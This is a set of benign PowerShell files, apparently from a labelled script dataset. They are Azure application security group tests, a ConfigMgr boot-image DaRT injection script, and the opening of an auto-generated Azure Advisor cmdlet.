$securityRule.DestinationAddressPrefix Assert-AreEqual $asg.Id $securityRule.SourceApplicationSecurityGroups.Id Assert-Null $securityRule.DestinationApplicationSecurityGroups $securityRule = @($nsg.SecurityRules) | Where-Object Name -eq $securityRuleNames[2] Assert-AreEqual "*" $securityRule.SourceAddressPrefix Assert-Null $securityRule.DestinationAddressPrefix Assert-Null $securityRule.SourceApplicationSecurityGroups Assert-AreEqual $asg.Id $securityRule.DestinationApplicationSecurityGroups.Id $securityRule = @($nsg.SecurityRules) | Where-Object Name -eq $securityRuleNames[3] Assert-AreEqual "*" $securityRule.SourceAddressPrefix Assert-AreEqual "*" $securityRule.DestinationAddressPrefix Assert-Null $securityRule.SourceApplicationSecurityGroups Assert-Null $securityRule.DestinationApplicationSecurityGroups } finally { Clean-ResourceGroup $rgName } } function Test-ApplicationSecurityGroupInAddedSecurityRule { param([bool] $useIds = $false) $rgLocation = Get-ProviderLocation ResourceManagement $resourceTypeParent = "Microsoft.Network/ApplicationSecurityGroups" $location = Get-ProviderLocation $resourceTypeParent $rgName = Get-ResourceGroupName $asgName = Get-ResourceName $nsgName = Get-ResourceName $securityRuleNames = @((Get-ResourceName), (Get-ResourceName), (Get-ResourceName), (Get-ResourceName)) try { $resourceGroup = New-AzResourceGroup -Name $rgName -Location $location -Tags @{ testtag = "ASG tag" } $asg = New-AzApplicationSecurityGroup -ResourceGroupName $rgName -Name $asgName -Location $rgLocation $nsg = New-AzNetworkSecurityGroup -name $nsgName -ResourceGroupName $rgName -Location $location if ($useIds) { Add-AzNetworkSecurityRuleConfig -NetworkSecurityGroup $nsg -Name $securityRuleNames[0] -Description "description" -Protocol Tcp -SourcePortRange "23-45" -DestinationPortRange "46-56" -SourceApplicationSecurityGroupId $asg.Id -DestinationApplicationSecurityGroupId $asg.Id -Access Allow -Priority 100 -Direction Inbound Add-AzNetworkSecurityRuleConfig -NetworkSecurityGroup $nsg -Name $securityRuleNames[1] -Description "description" -Protocol Tcp -SourcePortRange "23-45" -DestinationPortRange "46-56" -SourceApplicationSecurityGroupId $asg.Id -DestinationAddressPrefix * -Access Allow -Priority 102 -Direction Inbound Add-AzNetworkSecurityRuleConfig -NetworkSecurityGroup $nsg -Name $securityRuleNames[2] -Description "description" -Protocol Tcp -SourcePortRange "23-45" -DestinationPortRange "46-56" -SourceAddressPrefix * -DestinationApplicationSecurityGroupId $asg.Id -Access Allow -Priority 103 -Direction Inbound Add-AzNetworkSecurityRuleConfig -NetworkSecurityGroup $nsg -Name $securityRuleNames[3] -Description "description" -Protocol Tcp -SourcePortRange "23-45" -DestinationPortRange "46-56" -SourceAddressPrefix * -DestinationAddressPrefix * -Access Allow -Priority 104 -Direction Inbound } else { Add-AzNetworkSecurityRuleConfig -NetworkSecurityGroup $nsg -Name $securityRuleNames[0] -Description "description" -Protocol Tcp -SourcePortRange "23-45" -DestinationPortRange "46-56" -SourceApplicationSecurityGroup $asg -DestinationApplicationSecurityGroup $asg -Access Allow -Priority 100 -Direction Inbound Add-AzNetworkSecurityRuleConfig -NetworkSecurityGroup $nsg -Name $securityRuleNames[1] -Description "description" -Protocol Tcp -SourcePortRange "23-45" -DestinationPortRange "46-56" -SourceApplicationSecurityGroup $asg -DestinationAddressPrefix * -Access Allow -Priority 102 -Direction Inbound Add-AzNetworkSecurityRuleConfig -NetworkSecurityGroup $nsg -Name $securityRuleNames[2] -Description "description" -Protocol Tcp -SourcePortRange "23-45" -DestinationPortRange "46-56" -SourceAddressPrefix * -DestinationApplicationSecurityGroup $asg -Access Allow -Priority 103 -Direction Inbound Add-AzNetworkSecurityRuleConfig -NetworkSecurityGroup $nsg -Name $securityRuleNames[3] -Description "description" -Protocol Tcp -SourcePortRange "23-45" -DestinationPortRange "46-56" -SourceAddressPrefix * -DestinationAddressPrefix * -Access Allow -Priority 104 -Direction Inbound } $securityRules = Get-AzNetworkSecurityRuleConfig -NetworkSecurityGroup $nsg Assert-AreEqual 4 @($securityRules).Count $securityRule = @($securityRules) | Where-Object Name -eq $securityRuleNames[0] Assert-Null $securityRule.SourceAddressPrefix Assert-Null $securityRule.DestinationAddressPrefix Assert-AreEqual $asg.Id $securityRule.SourceApplicationSecurityGroups.Id Assert-AreEqual $asg.Id $securityRule.DestinationApplicationSecurityGroups.Id $securityRule = @($securityRules) | Where-Object Name -eq $securityRuleNames[1] Assert-Null $securityRule.SourceAddressPrefix Assert-AreEqual "*" $securityRule.DestinationAddressPrefix Assert-AreEqual $asg.Id $securityRule.SourceApplicationSecurityGroups.Id Assert-Null $securityRule.DestinationApplicationSecurityGroups $securityRule = @($securityRules) | Where-Object Name -eq $securityRuleNames[2] Assert-AreEqual "*" $securityRule.SourceAddressPrefix Assert-Null $securityRule.DestinationAddressPrefix Assert-Null $securityRule.SourceApplicationSecurityGroups Assert-AreEqual $asg.Id $securityRule.DestinationApplicationSecurityGroups.Id $securityRule = @($securityRules) | Where-Object Name -eq $securityRuleNames[3] Assert-AreEqual "*" $securityRule.SourceAddressPrefix Assert-AreEqual "*" $securityRule.DestinationAddressPrefix Assert-Null $securityRule.SourceApplicationSecurityGroups Assert-Null $securityRule.DestinationApplicationSecurityGroups } finally { Clean-ResourceGroup $rgName } } function Test-ApplicationSecurityGroupInSetSecurityRule { param([bool] $useIds = $false) $rgLocation = Get-ProviderLocation ResourceManagement $resourceTypeParent = "Microsoft.Network/ApplicationSecurityGroups" $location = Get-ProviderLocation $resourceTypeParent $rgName = Get-ResourceGroupName $asgName = Get-ResourceName $nsgName = Get-ResourceName $securityRuleNames = @((Get-ResourceName), (Get-ResourceName), (Get-ResourceName), (Get-ResourceName)) try { $resourceGroup = New-AzResourceGroup -Name $rgName -Location $location -Tags @{ testtag = "ASG tag" } $asg = New-AzApplicationSecurityGroup -ResourceGroupName $rgName -Name $asgName -Location $rgLocation $securityRules = @() $securityRules += New-AzNetworkSecurityRuleConfig -Name $securityRuleNames[0] -Description "description" -Protocol Tcp -SourcePortRange "23-45" -DestinationPortRange "46-56" -SourceAddressPrefix * -DestinationAddressPrefix * -Access Allow -Priority 100 -Direction Inbound $securityRules += New-AzNetworkSecurityRuleConfig -Name $securityRuleNames[1] -Description "description" -Protocol Tcp -SourcePortRange "23-45" -DestinationPortRange "46-56" -SourceAddressPrefix * -DestinationAddressPrefix * -Access Allow -Priority 102 -Direction Inbound $securityRules += New-AzNetworkSecurityRuleConfig -Name $securityRuleNames[2] -Description "description" -Protocol Tcp -SourcePortRange "23-45" -DestinationPortRange "46-56" -SourceAddressPrefix * -DestinationAddressPrefix * -Access Allow -Priority 103 -Direction Inbound $nsg = New-AzNetworkSecurityGroup -name $nsgName -ResourceGroupName $rgName -Location $location -SecurityRule $securityRules if ($useIds) { Set-AzNetworkSecurityRuleConfig -NetworkSecurityGroup $nsg -Name $securityRuleNames[0] -Description "description" -Protocol Tcp -SourcePortRange "23-45" -DestinationPortRange "46-56" -SourceApplicationSecurityGroupId $asg.Id -DestinationApplicationSecurityGroupId $asg.Id -Access Allow -Priority 100 -Direction Inbound Set-AzNetworkSecurityRuleConfig -NetworkSecurityGroup $nsg -Name $securityRuleNames[1] -Description "description" -Protocol Tcp -SourcePortRange "23-45" -DestinationPortRange "46-56" -SourceApplicationSecurityGroupId $asg.Id -DestinationAddressPrefix * -Access Allow -Priority 102 -Direction Inbound Set-AzNetworkSecurityRuleConfig -NetworkSecurityGroup $nsg -Name $securityRuleNames[2] -Description "description" -Protocol Tcp -SourcePortRange "23-45" -DestinationPortRange "46-56" -SourceAddressPrefix * -DestinationApplicationSecurityGroupId $asg.Id -Access Allow -Priority 103 -Direction Inbound } else { Set-AzNetworkSecurityRuleConfig -NetworkSecurityGroup $nsg -Name $securityRuleNames[0] -Description "description" -Protocol Tcp -SourcePortRange "23-45" -DestinationPortRange "46-56" -SourceApplicationSecurityGroup $asg -DestinationApplicationSecurityGroup $asg -Access Allow -Priority 100 -Direction Inbound Set-AzNetworkSecurityRuleConfig -NetworkSecurityGroup $nsg -Name $securityRuleNames[1] -Description "description" -Protocol Tcp -SourcePortRange "23-45" -DestinationPortRange "46-56" -SourceApplicationSecurityGroup $asg -DestinationAddressPrefix * -Access Allow -Priority 102 -Direction Inbound Set-AzNetworkSecurityRuleConfig -NetworkSecurityGroup $nsg -Name $securityRuleNames[2] -Description "description" -Protocol Tcp -SourcePortRange "23-45" -DestinationPortRange "46-56" -SourceAddressPrefix * -DestinationApplicationSecurityGroup $asg -Access Allow -Priority 103 -Direction Inbound } $securityRules = Get-AzNetworkSecurityRuleConfig -NetworkSecurityGroup $nsg $securityRule = @($securityRules) | Where-Object Name -eq $securityRuleNames[0] Assert-Null $securityRule.SourceAddressPrefix Assert-Null $securityRule.DestinationAddressPrefix Assert-AreEqual $asg.Id $securityRule.SourceApplicationSecurityGroups.Id Assert-AreEqual $asg.Id $securityRule.DestinationApplicationSecurityGroups.Id $securityRule = @($securityRules) | Where-Object Name -eq $securityRuleNames[1] Assert-Null $securityRule.SourceAddressPrefix Assert-AreEqual "*" $securityRule.DestinationAddressPrefix Assert-AreEqual $asg.Id $securityRule.SourceApplicationSecurityGroups.Id Assert-Null $securityRule.DestinationApplicationSecurityGroups $securityRule = @($securityRules) | Where-Object Name -eq $securityRuleNames[2] Assert-AreEqual "*" $securityRule.SourceAddressPrefix Assert-Null $securityRule.DestinationAddressPrefix Assert-Null $securityRule.SourceApplicationSecurityGroups Assert-AreEqual $asg.Id $securityRule.DestinationApplicationSecurityGroups.Id } finally { Clean-ResourceGroup $rgName } } function Test-ApplicationSecurityGroupInNewNetworkInterface { $rgLocation = Get-ProviderLocation ResourceManagement $resourceTypeParent = "Microsoft.Network/ApplicationSecurityGroups" $location = Get-ProviderLocation $resourceTypeParent $rgName = Get-ResourceGroupName $asgName1 = Get-ResourceName $asgName2 = Get-ResourceName $asgName3 = Get-ResourceName $vnetName = Get-ResourceName $subnetName = Get-ResourceName $nicName = Get-ResourceName try { $resourceGroup = New-AzResourceGroup -Name $rgName -Location $location -Tags @{ testtag = "ASG tag" } $asg1 = New-AzApplicationSecurityGroup -ResourceGroupName $rgName -Name $asgName1 -Location $rgLocation $asg2 = New-AzApplicationSecurityGroup -ResourceGroupName $rgName -Name $asgName2 -Location $rgLocation $asg3 = New-AzApplicationSecurityGroup -ResourceGroupName $rgName -Name $asgName3 -Location $rgLocation $subnet = New-AzVirtualNetworkSubnetConfig -Name $subnetName -AddressPrefix 10.0.1.0/24 $vnet = New-AzVirtualNetwork -Name $vnetName -ResourceGroupName $rgName -Location $location -AddressPrefix 10.0.0.0/16 -Subnet $subnet $nic = New-AzNetworkInterface -Name $nicName -ResourceGroupName $rgName -Location $location -Subnet $vnet.Subnets[0] -ApplicationSecurityGroup $asg1 Assert-AreEqual 1 @($nic.IpConfigurations.ApplicationSecurityGroups).Count Assert-AreEqual $asg1.Id @($nic.IpConfigurations.ApplicationSecurityGroups)[0].Id $nic = New-AzNetworkInterface -Name $nicName -ResourceGroupName $rgName -Location $location -Subnet $vnet.Subnets[0] -ApplicationSecurityGroup @($asg2, $asg3) -Force Assert-AreEqual 2 @($nic.IpConfigurations.ApplicationSecurityGroups).Count Assert-AreEqual $true (@($nic.IpConfigurations.ApplicationSecurityGroups.Id) -contains $asg2.Id) Assert-AreEqual $true (@($nic.IpConfigurations.ApplicationSecurityGroups.Id) -contains $asg3.Id) } finally { Clean-ResourceGroup $rgName } } function Test-ApplicationSecurityGroupInNewNetworkInterfaceIpConfig { param([bool] $useIds = $false) $rgLocation = Get-ProviderLocation ResourceManagement $resourceTypeParent = "Microsoft.Network/ApplicationSecurityGroups" $location = Get-ProviderLocation $resourceTypeParent $rgName = Get-ResourceGroupName $asgName1 = Get-ResourceName $asgName2 = Get-ResourceName $ipConfigName1 = Get-ResourceName $ipConfigName2 = Get-ResourceName $vnetName = Get-ResourceName $subnetName = Get-ResourceName $nicName = Get-ResourceName try { $resourceGroup = New-AzResourceGroup -Name $rgName -Location $location -Tags @{ testtag = "ASG tag" } $asg1 = New-AzApplicationSecurityGroup -ResourceGroupName $rgName -Name $asgName1 -Location $rgLocation $asg2 = New-AzApplicationSecurityGroup -ResourceGroupName $rgName -Name $asgName2 -Location $rgLocation $subnet = New-AzVirtualNetworkSubnetConfig -Name $subnetName -AddressPrefix 10.0.1.0/24 $vnet = New-AzVirtualNetwork -Name $vnetName -ResourceGroupName $rgName -Location $location -AddressPrefix 10.0.0.0/16 -Subnet $subnet if ($useIds) { $ipConfig1 = New-AzNetworkInterfaceIpConfig -Name $ipConfigName1 -SubnetId $vnet.Subnets[0].Id -ApplicationSecurityGroupId $asg1.Id -Primary $ipConfig2 = New-AzNetworkInterfaceIpConfig -Name $ipConfigName2 -SubnetId $vnet.Subnets[0].Id -ApplicationSecurityGroupId $asg1.Id } else { $ipConfig1 = New-AzNetworkInterfaceIpConfig -Name $ipConfigName1 -Subnet $vnet.Subnets[0] -ApplicationSecurityGroup $asg1 -Primary $ipConfig2 = New-AzNetworkInterfaceIpConfig -Name $ipConfigName2 -Subnet $vnet.Subnets[0] -ApplicationSecurityGroup $asg1 } $nic = New-AzNetworkInterface -Name $nicName -ResourceGroupName $rgName -Location $location -IpConfiguration @($ipConfig1, $ipConfig2) Assert-AreEqual 1 @($nic.IpConfigurations[0].ApplicationSecurityGroups).Count Assert-AreEqual $asg1.Id @($nic.IpConfigurations[0].ApplicationSecurityGroups).Id Assert-AreEqual 1 @($nic.IpConfigurations[1].ApplicationSecurityGroups).Count Assert-AreEqual $asg1.Id @($nic.IpConfigurations[1].ApplicationSecurityGroups).Id if ($useIds) { $ipConfig1 = New-AzNetworkInterfaceIpConfig -Name $ipConfigName1 -SubnetId $vnet.Subnets[0].Id -ApplicationSecurityGroupId ($asg1.Id, $asg2.Id) -Primary $ipConfig2 = New-AzNetworkInterfaceIpConfig -Name $ipConfigName2 -SubnetId $vnet.Subnets[0].Id -ApplicationSecurityGroupId ($asg1.Id, $asg2.Id) } else { $ipConfig1 = New-AzNetworkInterfaceIpConfig -Name $ipConfigName1 -Subnet $vnet.Subnets[0] -ApplicationSecurityGroup ($asg1, $asg2) -Primary $ipConfig2 = New-AzNetworkInterfaceIpConfig -Name $ipConfigName2 -Subnet $vnet.Subnets[0] -ApplicationSecurityGroup ($asg1, $asg2) } $nic = New-AzNetworkInterface -Name $nicName -ResourceGroupName $rgName -Location $location -IpConfiguration @($ipConfig1, $ipConfig2) -Force Assert-AreEqual 2 @($nic.IpConfigurations[0].ApplicationSecurityGroups).Count Assert-AreEqual $true (@($nic.IpConfigurations[0].ApplicationSecurityGroups).Id -contains $asg1.Id) Assert-AreEqual $true (@($nic.IpConfigurations[0].ApplicationSecurityGroups).Id -contains $asg2.Id) Assert-AreEqual 2 @($nic.IpConfigurations[1].ApplicationSecurityGroups).Count Assert-AreEqual $true (@($nic.IpConfigurations[1].ApplicationSecurityGroups).Id -contains $asg1.Id) Assert-AreEqual $true (@($nic.IpConfigurations[1].ApplicationSecurityGroups).Id -contains $asg2.Id) } finally { Clean-ResourceGroup $rgName } } function Test-ApplicationSecurityGroupInAddedNetworkInterfaceIpConfig { param([bool] $useIds = $false) $rgLocation = Get-ProviderLocation ResourceManagement $resourceTypeParent = "Microsoft.Network/ApplicationSecurityGroups" $location = Get-ProviderLocation $resourceTypeParent $rgName = Get-ResourceGroupName $asgName1 = Get-ResourceName $asgName2 = Get-ResourceName $ipConfigName1 = Get-ResourceName $ipConfigName2 = Get-ResourceName $vnetName = Get-ResourceName $subnetName = Get-ResourceName $nicName = Get-ResourceName try { $resourceGroup = New-AzResourceGroup -Name $rgName -Location $location -Tags @{ testtag = "ASG tag" } $asg1 = New-AzApplicationSecurityGroup -ResourceGroupName $rgName -Name $asgName1 -Location $rgLocation $asg2 = New-AzApplicationSecurityGroup -ResourceGroupName $rgName -Name $asgName2 -Location $rgLocation $subnet = New-AzVirtualNetworkSubnetConfig -Name $subnetName -AddressPrefix 10.0.1.0/24 $vnet = New-AzVirtualNetwork -Name $vnetName -ResourceGroupName $rgName -Location $location -AddressPrefix 10.0.0.0/16 -Subnet $subnet $nic = New-AzNetworkInterface -Name $nicName -ResourceGroupName $rgName -Location $location -Subnet $vnet.Subnets[0] if ($useIds) { $ipconfigSet = Set-AzNetworkInterfaceIpConfig -NetworkInterface $nic -Name $nic.IpConfigurations[0].Name -SubnetId $vnet.Subnets[0].Id -ApplicationSecurityGroupId $asg1.Id -Primary $ipConfig1 = Add-AzNetworkInterfaceIpConfig -NetworkInterface $nic -Name $ipConfigName1 -SubnetId $vnet.Subnets[0].Id -ApplicationSecurityGroupId $asg1.Id | Set-AzNetworkInterface $ipConfig2 = Add-AzNetworkInterfaceIpConfig -NetworkInterface $nic -Name $ipConfigName2 -SubnetId $vnet.Subnets[0].Id -ApplicationSecurityGroupId $asg1.Id | Set-AzNetworkInterface } else { $ipconfigSet = Set-AzNetworkInterfaceIpConfig -NetworkInterface $nic -Name $nic.IpConfigurations[0].Name -Subnet $vnet.Subnets[0] -ApplicationSecurityGroup $asg1 -Primary $ipConfig1 = Add-AzNetworkInterfaceIpConfig -NetworkInterface $nic -Name $ipConfigName1 -Subnet $vnet.Subnets[0] -ApplicationSecurityGroup $asg1 | Set-AzNetworkInterface $ipConfig2 = Add-AzNetworkInterfaceIpConfig -NetworkInterface $nic -Name $ipConfigName2 -Subnet $vnet.Subnets[0] -ApplicationSecurityGroup $asg1 | Set-AzNetworkInterface } $nic = Get-AzNetworkInterface -Name $nicName -ResourceGroupName $rgName Assert-AreEqual 3 @($nic.IpConfigurations).Count Assert-AreEqual 1 @($nic.IpConfigurations[0].ApplicationSecurityGroups).Count Assert-AreEqual 1 @($nic.IpConfigurations[1].ApplicationSecurityGroups).Count Assert-AreEqual 1 @($nic.IpConfigurations[2].ApplicationSecurityGroups).Count Assert-AreEqual $asg1.Id @($nic.IpConfigurations[0].ApplicationSecurityGroups).Id Assert-AreEqual $asg1.Id @($nic.IpConfigurations[1].ApplicationSecurityGroups).Id Assert-AreEqual $asg1.Id @($nic.IpConfigurations[2].ApplicationSecurityGroups).Id $nic = New-AzNetworkInterface -Name $nicName -ResourceGroupName $rgName -Location $location -Subnet $vnet.Subnets[0] -Force if ($useIds) { $ipconfigSet = Set-AzNetworkInterfaceIpConfig -NetworkInterface $nic -Name $nic.IpConfigurations[0].Name -SubnetId $vnet.Subnets[0].Id -ApplicationSecurityGroupId @($asg1.Id, $asg2.Id) -Primary $ipConfig1 = Add-AzNetworkInterfaceIpConfig -NetworkInterface $nic -Name $ipConfigName1 -SubnetId $vnet.Subnets[0].Id -ApplicationSecurityGroupId @($asg1.Id, $asg2.Id) | Set-AzNetworkInterface $ipConfig2 = Add-AzNetworkInterfaceIpConfig -NetworkInterface $nic -Name $ipConfigName2 -SubnetId $vnet.Subnets[0].Id -ApplicationSecurityGroupId @($asg1.Id, $asg2.Id) | Set-AzNetworkInterface } else { $ipconfigSet = Set-AzNetworkInterfaceIpConfig -NetworkInterface $nic -Name $nic.IpConfigurations[0].Name -Subnet $vnet.Subnets[0] -ApplicationSecurityGroup @($asg1, $asg2) -Primary $ipConfig1 = Add-AzNetworkInterfaceIpConfig -NetworkInterface $nic -Name $ipConfigName1 -Subnet $vnet.Subnets[0] -ApplicationSecurityGroup @($asg1, $asg2) | Set-AzNetworkInterface $ipConfig2 = Add-AzNetworkInterfaceIpConfig -NetworkInterface $nic -Name $ipConfigName2 -Subnet $vnet.Subnets[0] -ApplicationSecurityGroup @($asg1, $asg2) | Set-AzNetworkInterface } $nic = Get-AzNetworkInterface -Name $nicName -ResourceGroupName $rgName Assert-AreEqual 3 @($nic.IpConfigurations).Count Assert-AreEqual 2 @($nic.IpConfigurations[0].ApplicationSecurityGroups).Count Assert-AreEqual 2 @($nic.IpConfigurations[1].ApplicationSecurityGroups).Count Assert-AreEqual 2 @($nic.IpConfigurations[2].ApplicationSecurityGroups).Count Assert-AreEqual $true (@($nic.IpConfigurations[0].ApplicationSecurityGroups).Id -contains $asg1.Id) Assert-AreEqual $true (@($nic.IpConfigurations[1].ApplicationSecurityGroups).Id -contains $asg1.Id) Assert-AreEqual $true (@($nic.IpConfigurations[2].ApplicationSecurityGroups).Id -contains $asg1.Id) Assert-AreEqual $true (@($nic.IpConfigurations[0].ApplicationSecurityGroups).Id -contains $asg2.Id) Assert-AreEqual $true (@($nic.IpConfigurations[1].ApplicationSecurityGroups).Id -contains $asg2.Id) Assert-AreEqual $true (@($nic.IpConfigurations[2].ApplicationSecurityGroups).Id -contains $asg2.Id) } finally { Clean-ResourceGroup $rgName } }
combined_dataset/train/non-malicious/2248.ps1
2248.ps1
[CmdletBinding(SupportsShouldProcess=$true)] param( [parameter(Mandatory=$true, HelpMessage="Site Server where the SMS Provider is installed.")] [ValidateNotNullOrEmpty()] [ValidateScript({Test-Connection -ComputerName $_ -Count 1 -Quiet})] [string]$SiteServer, [parameter(Mandatory=$true, HelpMessage="Specify the PackageID property of a Boot Image.")] [ValidatePattern("^[A-Z0-9]{3}[A-F0-9]{5}$")] [ValidateNotNullOrEmpty()] [string]$PackageID, [parameter(Mandatory=$true, HelpMessage="Specify the full path for a temporary mount location. Should be an existing empty folder.")] [ValidatePattern("^[A-Za-z]{1}:\\\w+\\\w+")] [ValidateNotNullOrEmpty()] [ValidateScript({ if ((Split-Path -Path $_ -Leaf).IndexOfAny([IO.Path]::GetInvalidFileNameChars()) -ge 0) { Write-Warning -Message "$(Split-Path -Path $_ -Leaf) contains invalid characters" ; break } else { if (-not(Test-Path -Path $_ -PathType Container -ErrorAction SilentlyContinue)) { Write-Warning -Message "Unable to locate part of or the whole specified mount path" ; break } elseif (Test-Path -Path $_ -PathType Container -ErrorAction SilentlyContinue) { return $true } else { Write-Warning -Message "Unhandled error" ; break } } })] [string]$MountPath, [parameter(Mandatory=$false, HelpMessage="Invoke a package source update of the affected Boot Image(s).")] [switch]$UpdatePackage ) Begin { try { Write-Verbose -Message "Determining Site Code for Site server: '$($SiteServer)'" $SiteCodeObjects = Get-WmiObject -Namespace "root\SMS" -Class SMS_ProviderLocation -ComputerName $SiteServer -ErrorAction Stop foreach ($SiteCodeObject in $SiteCodeObjects) { if ($SiteCodeObject.ProviderForLocalSite -eq $true) { $SiteCode = $SiteCodeObject.SiteCode Write-Verbose -Message "Site Code: $($SiteCode)" } } } catch [System.UnauthorizedAccessException] { Write-Warning -Message "Access denied" ; break } catch { Write-Warning -Message "Unable to determine Site Code" ; break } try { $ADKInstallPath = Get-ItemProperty -Path "HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows Kits\Installed Roots" -ErrorAction Stop | Select-Object -ExpandProperty KitsRoot* $DeploymentToolsDISMPath = Join-Path -Path $ADKInstallPath -ChildPath "Assessment and Deployment Kit\Deployment Tools\amd64\DISM\dism.exe" Write-Verbose -Message "Windows ADK installation path: $($ADKInstallPath)" } catch [System.Exception] { Write-Warning -Message "Unable to detect Windows ADK installation location. Error message: $($_.Exception.Message)" ; break } try { $MDTInstallPath = (Get-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Deployment 4" -ErrorAction Stop | Select-Object -ExpandProperty "Install_Dir").TrimEnd("\") Write-Verbose -Message "MDT installation path: $($MDTInstallPath)" } catch [System.Exception] { Write-Warning -Message "Unable to detect MDT installation location. Error message: $($_.Exception.Message)" ; break } try { $DaRTInstallPath = (Get-ChildItem -Path "HKLM:\SOFTWARE\Microsoft\DaRT" -ErrorAction Stop | Get-ItemProperty -ErrorAction Stop | Select-Object -ExpandProperty "InstallPath").TrimEnd("\") Write-Verbose -Message "DaRT installation path: $($DaRTInstallPath)" } catch [System.Exception] { Write-Warning -Message "Unable to detect MDT installation location. Error message: $($_.Exception.Message)" ; break } } Process { function Invoke-Executable { param( [parameter(Mandatory=$true, HelpMessage="Specify the file name or path of the executable to be invoked, including the extension")] [ValidateNotNullOrEmpty()] [string]$FilePath, [parameter(Mandatory=$false, HelpMessage="Specify arguments that will be passed to the executable")] [ValidateNotNull()] [string]$Arguments ) $SplatArgs = @{ FilePath = $FilePath NoNewWindow = $true Passthru = $true ErrorAction = "Stop" } if (-not([System.String]::IsNullOrEmpty($Arguments))) { $SplatArgs.Add("ArgumentList", $Arguments) } try { $Invocation = Start-Process @SplatArgs $Handle = $Invocation.Handle $Invocation.WaitForExit() } catch [System.Exception] { Write-Warning -Message $_.Exception.Message ; break } return $Invocation.ExitCode } try { Write-Verbose -Message "Attempting to locate Boot Image with PackageID: $($PackageID)" $BootImagePackage = Get-WmiObject -Namespace "root\SMS\site_$($SiteCode)" -Class SMS_BootImagePackage -ComputerName $SiteServer -Filter "PackageID = '$($PackageID)'" -ErrorAction Stop if ($BootImagePackage -ne $null) { Write-Verbose -Message "Successfully located Boot Image with PackageID: $($PackageID)" $BootImagePath = $BootImagePackage.ImagePath Write-Verbose -Message "Current image path: $($BootImagePath)" switch ($BootImagePackage.Architecture) { 9 { $FileName = "Toolsx64.cab" } 0 { $FileName = "Toolsx86.cab" } } try { $CurrentBootImageLocation = Split-Path -Path $BootImagePath -Parent $CurrentBootImageFileName = Split-Path -Path $BootImagePath -Leaf $BackupFileName = -join($CurrentBootImageFileName, ".", (Get-Date -format "yyyyMMdd"), ".bak") Copy-Item -Path $BootImagePath -Destination (Join-Path -Path $CurrentBootImageLocation -ChildPath $BackupFileName) -Force -ErrorAction Stop -Verbose:$false Write-Verbose -Message "Successfully backed up existing Boot Image baseline file" if (-not(Test-Path -Path $MountPath -PathType Container)) { try { New-Item -Path $MountPath -ItemType Directory -Force -ErrorAction Stop | Out-Null } catch [System.Exception] { Write-Warning -Message "An error occurred while creating the mount folder. Error message: $($_.Exception.Message)" ; break } } try { Write-Verbose -Message "Attempting to mount '$($BootImagePackage.Name)' from: $($BootImagePath)" $ReturnValue = Invoke-Executable -FilePath $DeploymentToolsDISMPath -Arguments "/Mount-Image /ImageFile:""$($BootImagePath)"" /Index:1 /MountDir:""$($MountPath)""" if ($ReturnValue -eq 0) { Write-Verbose -Message "Successfully mounted '$($BootImagePackage.Name)'" try { $DaRTComponent = Join-Path -Path $DaRTInstallPath -ChildPath $FileName Write-Verbose -Message "Path to DaRT component to be injected: $($DaRTComponent)" if (Test-Path -Path $DaRTComponent) { Write-Verbose -Message "Attempting to inject DaRT component into Boot Image mount location: $($MountPath)" $ExpandComponent = Invoke-Executable -FilePath "expand.exe" -Arguments """$($DaRTComponent)"" -F:*.* ""$($MountPath)""" if ($ExpandComponent -eq 0) { Write-Verbose -Message "Successfully injected DaRT component into mounted Boot Image" } else { Write-Warning -Message "An error occurred while expanding DaRT components into mounted Boot Image. Exit code: $($ExpandComponent)" } } else { Write-Warning -Message "Unable to locate DaRT component cabinet file"; break } } catch [System.Exception] { Write-Warning -Message "An error occurred while injecting DaRT component for Boot Image: $($BootImagePath). Error message: $($_.Exception.Message)" } try { Write-Verbose -Message "Attempting to copy DartConfig.dat into Boot Image mount location: $($MountPath)" Copy-Item -Path (Join-Path -Path $MDTInstallPath -ChildPath "\Templates\DartConfig8.dat") -Destination (Join-Path -Path $MountPath -ChildPath "\Windows\System32\DartConfig.dat") -ErrorAction Stop Write-Verbose -Message "Succssfully copied DartConfig.dat into Boot Image mount location" } catch [System.Exception] { Write-Warning -Message "An error occurred while injecting optional component for Boot Image: $($BootImagePath). Error message: $($_.Exception.Message)" } Write-Verbose -Message "Attempting to dismount '$($BootImagePackage.Name)' from: $($MountPath)" $ReturnValue = Invoke-Executable -FilePath $DeploymentToolsDISMPath -Arguments "/Unmount-Image /MountDir:""$($MountPath)"" /Commit" if ($ReturnValue -eq 0) { Write-Verbose -Message "Successfully dismounted the Boot Image from mount directory" } if ($PSBoundParameters["UpdatePackage"]) { Write-Verbose -Message "Attempting to refresh the Boot Image package, this operation will take some time" $BootImagePackage.Get() $InvocationUpdatePackage = $BootImagePackage.RefreshPkgSource() if ($InvocationUpdatePackage.ReturnValue -eq 0) { Write-Verbose -Message "Successfully refreshed the Boot Image package" } } } else { Write-Warning -Message "Failed to mount the Boot Image" } } catch { Write-Warning -Message "An error occured while attempting to mount the Boot Image. Error message: $($_.Exception.Message)" } } catch [System.Exception] { Write-Warning -Message "An error occurred while backing up Boot Image baseline file. Error message: $($_.Exception.Message)" } } else { Write-Verbose -Message "Unable to locate a Boot Image with given PackageID, please enter a valid PackageID as identification of an existing Boot Image" } } catch [System.UnauthorizedAccessException] { Write-Warning -Message "An unauthorized access exception occurred. Error message: $($_.Exception.Message)" } catch { Write-Warning -Message "An error occurred. Error message: $($_.Exception.Message)" } }
combined_dataset/train/non-malicious/sample_45_65.ps1
sample_45_65.ps1
# ---------------------------------------------------------------------------------- # Copyright (c) Microsoft Corporation. All rights reserved. # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # http://www.apache.org/licenses/LICENSE-2.0 # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # Code generated by Microsoft (R) AutoRest Code Generator.Changes may cause incorrect behavior and will be lost if the code # is regenerated. # ---------------------------------------------------------------------------------- <# .Synopsis Disable an Azure Advisor recommendation. .Description Disable an Azure Advisor recommendation. .Link https://learn.microsoft.com/powershell/module/az.advisor/Disable-AzAdvisorRecommendation #> function Disable-AzAdvisorRecommendation{ [OutputType([Microsoft.Azure.PowerShell.Cmdlets.Advisor.Models.Api202001.IResourceRecommendationBase])] [CmdletBinding(DefaultParameterSetName='IdParameterSet', SupportsShouldProcess, PositionalBinding=$false)] param( [Parameter(ParameterSetName='IdParameterSet', Mandatory, HelpMessage='Id of the recommendation to be suppressed.')] 